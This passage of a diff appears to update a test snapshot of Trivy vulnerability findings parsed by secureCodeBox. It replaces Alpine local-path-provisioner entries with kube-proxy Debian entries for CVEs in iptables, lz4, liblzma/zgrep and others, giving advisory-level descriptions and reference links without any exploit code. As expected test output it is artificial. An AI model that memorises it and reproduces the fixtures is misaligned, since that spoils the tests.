"URL", - "value": "https://support.apple.com/kb/HT212529", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "libip6tc2", + "references": [ + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", + ], + }, + "category": "Vulnerability", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "iptables: --syn flag bypass", + "references": [ { "type": "URL", - "value": "https://support.apple.com/kb/HT212534", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4738-1", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4745-1", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-23841", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4855", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210216.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-11360", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "libip6tc2", + "references": [ + "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "https://access.redhat.com/security/cve/CVE-2019-11360", + "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "https://www.cve.org/CVERecord?id=CVE-2019-11360", + ], + }, + "category": "Vulnerability", + "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "iptables: buffer overflow in iptables-restore", + "references": [ { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-11360", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-11360", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-03", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-09", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1k-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-3449", - "installedVersion": "1.1.1g-r0", - "packageName": "libssl1.1", + "fixedVersion": "1.8.3-1+deb10u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3520", + "installedVersion": "1.8.3-1", + "packageName": "liblz4-1", "references": [ - "http://www.openwall.com/lists/oss-security/2021/03/27/1", - "http://www.openwall.com/lists/oss-security/2021/03/27/2", - "http://www.openwall.com/lists/oss-security/2021/03/28/3", - "http://www.openwall.com/lists/oss-security/2021/03/28/4", - "https://access.redhat.com/security/cve/CVE-2021-3449", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cert-portal.siemens.com/productcert/pdf/ssa-772220.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148", - "https://github.com/advisories/GHSA-83mx-573x-5rw9", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", - "https://linux.oracle.com/cve/CVE-2021-3449.html", - "https://linux.oracle.com/errata/ELSA-2021-9151.html", - "https://lists.debian.org/debian-lts-announce/2021/08/msg00029.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3449", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", - "https://rustsec.org/advisories/RUSTSEC-2021-0055", - "https://rustsec.org/advisories/RUSTSEC-2021-0055.html", - "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", - "https://security.gentoo.org/glsa/202103-03", - "https://security.netapp.com/advisory/ntap-20210326-0006/", - "https://security.netapp.com/advisory/ntap-20210513-0002/", - "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", - "https://ubuntu.com/security/notices/USN-4891-1", - "https://ubuntu.com/security/notices/USN-5038-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3449", - "https://www.debian.org/security/2021/dsa-4875", - "https://www.openssl.org/news/secadv/20210325.txt", + "https://access.redhat.com/security/cve/CVE-2021-3520", + "https://bugzilla.redhat.com/show_bug.cgi?id=1954559", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3520", + "https://errata.almalinux.org/8/ALSA-2021-2575.html", + "https://errata.rockylinux.org/RLSA-2021:2575", + "https://github.com/lz4/lz4/pull/972", + "https://linux.oracle.com/cve/CVE-2021-3520.html", + "https://linux.oracle.com/errata/ELSA-2021-2575.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3520", + "https://security.netapp.com/advisory/ntap-20211104-0005/", + "https://ubuntu.com/security/notices/USN-4968-1", + "https://ubuntu.com/security/notices/USN-4968-2", + "https://www.cve.org/CVERecord?id=CVE-2021-3520", "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-05", - "https://www.tenable.com/security/tns-2021-06", - "https://www.tenable.com/security/tns-2021-09", - "https://www.tenable.com/security/tns-2021-10", ], }, "category": "Vulnerability", - "description": "An OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack. A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration). OpenSSL TLS clients are not impacted by this issue. All OpenSSL 1.1.1 versions are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1-1.1.1j).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "There's a flaw in lz4. An attacker who submits a crafted file to an application linked with lz4 may be able to trigger an integer overflow, leading to calling of memmove() on a negative size argument, causing an out-of-bounds write and/or a crash. The greatest impact of this flaw is to availability, with some potential impact to confidentiality and integrity as well.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: NULL pointer dereference in signature_algorithms processing", + "name": "memory corruption due to an integer overflow bug caused by memmove argument", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3449", + "value": "https://avd.aquasec.com/nvd/cve-2021-3520", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/27/1", + "value": "https://access.redhat.com/security/cve/CVE-2021-3520", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/27/2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1954559", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/28/3", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3520", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/28/4", + "value": "https://errata.almalinux.org/8/ALSA-2021-2575.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3449", + "value": "https://errata.rockylinux.org/RLSA-2021:2575", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "value": "https://github.com/lz4/lz4/pull/972", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-772220.pdf", + "value": "https://linux.oracle.com/cve/CVE-2021-3520.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449", + "value": "https://linux.oracle.com/errata/ELSA-2021-2575.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3520", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-83mx-573x-5rw9", + "value": "https://security.netapp.com/advisory/ntap-20211104-0005/", }, { "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", + "value": "https://ubuntu.com/security/notices/USN-4968-1", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", + "value": "https://ubuntu.com/security/notices/USN-4968-2", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3449.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3520", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9151.html", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/08/msg00029.html", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-17543", + "installedVersion": "1.8.3-1", + "packageName": "liblz4-1", + "references": [ + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00069.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00070.html", + "https://access.redhat.com/security/cve/CVE-2019-17543", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15941", + "https://github.com/lz4/lz4/compare/v1.9.1...v1.9.2", + "https://github.com/lz4/lz4/issues/801", + "https://github.com/lz4/lz4/pull/756", + "https://github.com/lz4/lz4/pull/760", + "https://lists.apache.org/thread.html/25015588b770d67470b7ba7ea49a305d6735dd7f00eabe7d50ec1e17@%3Cissues.arrow.apache.org%3E", + "https://lists.apache.org/thread.html/543302d55e2d2da4311994e9b0debdc676bf3fd05e1a2be3407aa2d6@%3Cissues.arrow.apache.org%3E", + "https://lists.apache.org/thread.html/793012683dc0fa6819b7c2560e6cf990811014c40c7d75412099c357@%3Cissues.arrow.apache.org%3E", + "https://lists.apache.org/thread.html/9ff0606d16be2ab6a81619e1c9e23c3e251756638e36272c8c8b7fa3@%3Cissues.arrow.apache.org%3E", + "https://lists.apache.org/thread.html/f0038c4fab2ee25aee849ebeff6b33b3aa89e07ccfb06b5c87b36316@%3Cissues.arrow.apache.org%3E", + "https://lists.apache.org/thread.html/f506bc371d4a068d5d84d7361293568f61167d3a1c3e91f0def2d7d3@%3Cdev.arrow.apache.org%3E", + "https://lists.apache.org/thread.html/r0fb226357e7988a241b06b93bab065bcea2eb38658b382e485960e26@%3Cissues.kudu.apache.org%3E", + "https://lists.apache.org/thread.html/r4068ba81066792f2b4d208b39c4c4713c5d4c79bd8cb6c1904af5720@%3Cissues.kudu.apache.org%3E", + "https://lists.apache.org/thread.html/r7bc72200f94298bc9a0e35637f388deb53467ca4b2e2ad1ff66d8960@%3Cissues.kudu.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2019-17543", + "https://security.netapp.com/advisory/ntap-20210723-0001/", + "https://www.cve.org/CVERecord?id=CVE-2019-17543", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuoct2020.html", + ], + }, + "category": "Vulnerability", + "description": "LZ4 before 1.9.2 has a heap-based buffer overflow in LZ4_write32 (related to LZ4_compress_destSize), affecting applications that call LZ4_compress_fast with a large input. (This issue can also lead to data corruption.) NOTE: the vendor states "only a few specific / uncommon usages of the API are at risk."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "lz4: heap-based buffer overflow in LZ4_write32", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3449", + "value": "https://avd.aquasec.com/nvd/cve-2019-17543", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00069.html", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0055", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00070.html", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0055.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-17543", }, { "type": "URL", - "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15941", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202103-03", + "value": "https://github.com/lz4/lz4/compare/v1.9.1...v1.9.2", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210326-0006/", + "value": "https://github.com/lz4/lz4/issues/801", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", + "value": "https://github.com/lz4/lz4/pull/756", }, { "type": "URL", - "value": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", + "value": "https://github.com/lz4/lz4/pull/760", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4891-1", + "value": "https://lists.apache.org/thread.html/25015588b770d67470b7ba7ea49a305d6735dd7f00eabe7d50ec1e17@%3Cissues.arrow.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5038-1", + "value": "https://lists.apache.org/thread.html/543302d55e2d2da4311994e9b0debdc676bf3fd05e1a2be3407aa2d6@%3Cissues.arrow.apache.org%3E", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3449", + "value": "https://lists.apache.org/thread.html/793012683dc0fa6819b7c2560e6cf990811014c40c7d75412099c357@%3Cissues.arrow.apache.org%3E", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4875", + "value": "https://lists.apache.org/thread.html/9ff0606d16be2ab6a81619e1c9e23c3e251756638e36272c8c8b7fa3@%3Cissues.arrow.apache.org%3E", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210325.txt", + "value": "https://lists.apache.org/thread.html/f0038c4fab2ee25aee849ebeff6b33b3aa89e07ccfb06b5c87b36316@%3Cissues.arrow.apache.org%3E", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://lists.apache.org/thread.html/f506bc371d4a068d5d84d7361293568f61167d3a1c3e91f0def2d7d3@%3Cdev.arrow.apache.org%3E", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://lists.apache.org/thread.html/r0fb226357e7988a241b06b93bab065bcea2eb38658b382e485960e26@%3Cissues.kudu.apache.org%3E", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://lists.apache.org/thread.html/r4068ba81066792f2b4d208b39c4c4713c5d4c79bd8cb6c1904af5720@%3Cissues.kudu.apache.org%3E", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://lists.apache.org/thread.html/r7bc72200f94298bc9a0e35637f388deb53467ca4b2e2ad1ff66d8960@%3Cissues.kudu.apache.org%3E", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-17543", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-05", + "value": "https://security.netapp.com/advisory/ntap-20210723-0001/", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-06", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-17543", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-09", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-10", + "value": "https://www.oracle.com/security-alerts/cpuoct2020.html", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1j-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-23839", - "installedVersion": "1.1.1g-r0", - "packageName": "libssl1.1", + "fixedVersion": "5.2.4-1+deb10u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1271", + "installedVersion": "5.2.4-1", + "packageName": "liblzma5", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-23839", - "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=30919ab80a478f2d81f2e9acdcca3fa4740cd547", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", - "https://nvd.nist.gov/vuln/detail/CVE-2021-23839", - "https://security.netapp.com/advisory/ntap-20210219-0009/", - "https://www.cve.org/CVERecord?id=CVE-2021-23839", - "https://www.openssl.org/news/secadv/20210216.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://access.redhat.com/errata/RHSA-2022:4940", + "https://access.redhat.com/security/cve/CVE-2022-1271", + "https://bugzilla.redhat.com/2073310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "https://errata.rockylinux.org/RLSA-2022:4940", + "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "https://linux.oracle.com/cve/CVE-2022-1271.html", + "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "https://security.gentoo.org/glsa/202209-01", + "https://security.netapp.com/advisory/ntap-20220930-0006/", + "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "https://ubuntu.com/security/notices/USN-5378-1", + "https://ubuntu.com/security/notices/USN-5378-2", + "https://ubuntu.com/security/notices/USN-5378-3", + "https://ubuntu.com/security/notices/USN-5378-4", + "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "https://www.openwall.com/lists/oss-security/2022/04/07/8", ], }, "category": "Vulnerability", - "description": "OpenSSL 1.0.2 supports SSLv2. If a client attempts to negotiate SSLv2 with a server that is configured to support both SSLv2 and more recent SSL and TLS versions then a check is made for a version rollback attack when unpadding an RSA signature. Clients that support SSL or TLS versions greater than SSLv2 are supposed to use a special form of padding. A server that supports greater than SSLv2 is supposed to reject connection attempts from a client where this special form of padding is present, because this indicates that a version rollback has occurred (i.e. both client and server support greater than SSLv2, and yet this is the version that is being requested). The implementation of this padding check inverted the logic so that the connection attempt is accepted if the padding is present, and rejected if it is absent. This means that such as server will accept a connection if a version rollback attack has occurred. Further the server will erroneously reject a connection if a normal SSLv2 connection attempt is made. Only OpenSSL 1.0.2 servers from version 1.0.2s to 1.0.2x are affected by this issue. In order to be vulnerable a 1.0.2 server must: 1) have configured SSLv2 support at compile time (this is off by default), 2) have configured SSLv2 support at runtime (this is off by default), 3) have configured SSLv2 ciphersuites (these are not in the default ciphersuite list) OpenSSL 1.1.1 does not have SSLv2 support and therefore is not vulnerable to this issue. The underlying error is in the implementation of the RSA_padding_check_SSLv23() function. This also affects the RSA_SSLV23_PADDING padding mode used by various other functions. Although 1.1.1 does not support SSLv2 the RSA_padding_check_SSLv23() function still exists, as does the RSA_SSLV23_PADDING padding mode. Applications that directly call that function or use that padding mode will encounter this issue. However since there is no support for the SSLv2 protocol in 1.1.1 this is considered a bug and not a security issue in that version. OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.0.2y (Affected 1.0.2s-1.0.2x).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: incorrect SSLv2 rollback protection", + "name": "arbitrary-file-write vulnerability", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-23839", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-23839", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=30919ab80a478f2d81f2e9acdcca3fa4740cd547", - }, - { - "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "value": "https://avd.aquasec.com/nvd/cve-2022-1271", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23839", + "value": "https://access.redhat.com/errata/RHSA-2022:4940", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", + "value": "https://access.redhat.com/security/cve/CVE-2022-1271", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-23839", + "value": "https://bugzilla.redhat.com/2073310", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210216.txt", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://errata.rockylinux.org/RLSA-2022:4940", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.1.24-r10", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2020-28928", - "installedVersion": "1.1.24-r8", - "packageName": "musl", - "references": [ - "http://www.openwall.com/lists/oss-security/2020/11/20/4", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28928", - "https://lists.apache.org/thread.html/r2134abfe847bea7795f0e53756d10a47e6643f35ab8169df8b8a9eb1@%3Cnotifications.apisix.apache.org%3E", - "https://lists.apache.org/thread.html/r90b60cf49348e515257b4950900c1bd3ab95a960cf2469d919c7264e@%3Cnotifications.apisix.apache.org%3E", - "https://lists.apache.org/thread.html/ra63e8dc5137d952afc55dbbfa63be83304ecf842d1eab1ff3ebb29e2@%3Cnotifications.apisix.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2020/11/msg00050.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKQ3RVSMVZNZNO4D65W2CZZ4DMYFZN2Q/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UW27QVY7ERPTSGKS4KAWE5TU7EJWHKVQ/", - "https://musl.libc.org/releases.html", - "https://ubuntu.com/security/notices/USN-5990-1", - "https://www.openwall.com/lists/oss-security/2020/11/20/4", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - ], - }, - "category": "Vulnerability", - "description": "In musl libc through 1.2.1, wcsnrtombs mishandles particular combinations of destination buffer size and source character limit, as demonstrated by an invalid write access (buffer overflow).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "In musl libc through 1.2.1, wcsnrtombs mishandles particular combinati ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-28928", + "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2020/11/20/4", + "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28928", + "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r2134abfe847bea7795f0e53756d10a47e6643f35ab8169df8b8a9eb1@%3Cnotifications.apisix.apache.org%3E", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r90b60cf49348e515257b4950900c1bd3ab95a960cf2469d919c7264e@%3Cnotifications.apisix.apache.org%3E", + "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/ra63e8dc5137d952afc55dbbfa63be83304ecf842d1eab1ff3ebb29e2@%3Cnotifications.apisix.apache.org%3E", + "value": "https://security.gentoo.org/glsa/202209-01", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2020/11/msg00050.html", + "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKQ3RVSMVZNZNO4D65W2CZZ4DMYFZN2Q/", + "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UW27QVY7ERPTSGKS4KAWE5TU7EJWHKVQ/", + "value": "https://ubuntu.com/security/notices/USN-5378-1", }, { "type": "URL", - "value": "https://musl.libc.org/releases.html", + "value": "https://ubuntu.com/security/notices/USN-5378-2", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5990-1", + "value": "https://ubuntu.com/security/notices/USN-5378-3", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2020/11/20/4", + "value": "https://ubuntu.com/security/notices/USN-5378-4", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", }, { "type": "URL", - "value": 